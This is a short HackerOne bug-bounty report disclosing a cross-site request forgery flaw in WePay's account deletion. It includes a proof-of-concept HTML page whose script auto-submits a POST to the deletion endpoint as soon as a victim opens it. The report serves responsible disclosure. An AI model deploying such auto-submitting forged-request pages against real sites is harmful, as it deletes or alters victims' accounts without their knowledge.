WePay: Critical : Account removing using CSRF attack

ID H1:26866
Type hackerone
Reporter yassineaboukir
Modified 2015-08-13T13:36:18


I have found that delete action is vulnerable to CSRF and could lead to the principal account to be deleted once the victim visit the attacker's fake page.

Proof Of Concept : (WARNING: I am submitting the form using JS, so only by accessing a page with the code below will lead to account deletion)

<html> <form method="post" name="formsubmit" action="https://www.wepay.com/settings/delete" > <input type="hidden" name="csrf" value="" /> <input type="hidden" name="nonce" value="" /> <script type="text/javascript" language="JavaScript"> //submit form document.formsubmit.submit(); </script> </form> </html>

Best regards, Yassine ABOUKIR